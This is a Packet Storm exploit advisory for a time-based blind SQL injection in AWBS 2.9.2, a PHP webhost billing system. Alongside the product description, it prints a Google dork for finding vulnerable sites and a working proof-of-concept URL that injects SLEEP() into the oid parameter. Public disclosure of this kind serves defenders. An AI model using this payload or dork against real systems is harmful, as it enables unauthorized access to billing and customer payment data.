exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AWBS 2.9.2 Blind SQL Injection

AWBS 2.9.2 Blind SQL Injection
Posted Jan 17, 2011
Authored by ShivX

AWBS version 2.9.2 suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | f86deb0cb5314dd3131d117a51cf0dbe057b80e236017711b27b2d3500535598

AWBS 2.9.2 Blind SQL Injection

Change Mirror Download
AWBS 2.9.2 Blind SQL Injection 0day
=============================================================================================
Dork....: inurl:/cart?ca=add_other&oid=
Date....: 01-16-2011
Author..: ShivX
Contact.: shivanx[at]gmail[dot]com
Vendor..: http://www.awbs.com
Link....: http://www.awbs.com/packages.php?spt=10 (or demo site)
Version.: 2.9.2 (Possibly <=)
Tested..: RedHat EL 5.6 (Tikanga)
CVE.....: N/A (0day)
=============================================================================================
---Introduction---

Advanced Webhost Billing System (AWBS) is webhosting billpay software written in PHP.
AWBS includes a complete frontend written in XHTML/CSS. This frontend can be used as your
website or in portal mode as a separate client portal and allows for full customization of
its look.

AWBS will communicate to your configured payment gateway(s) to perform live payments while
customers place orders. Once orders are placed, AWBS will then communicate to your configured
registrar, hosting server or reseller hosting account to complete the orders automatically,
then send your configured email(s) to the client(s).

AWBS will:
- Generate invoices and email your clients notifying them a payment is due.
- Automatically charge account balance or credit card on file on the invoice's due date.
- Notify clients if the credit card on file is expired or declined.
- Send domain renewal notices and automatically renew domains.
- Suspend or unsuspend hosting accounts when a payment is not made or paid.

The AWBS backend (admin interface) provides you with a quick and easy 'check in' homepage so
you can find new orders, helpdesk tickets, contact form submissions, affiliate signups,
overdue invoices, errors that may have occurred, and basic sales stats.
=============================================================================================
---Vulnerability---

http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]
=============================================================================================
---PoC Using Time-Based Blind SQL Injection---

https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close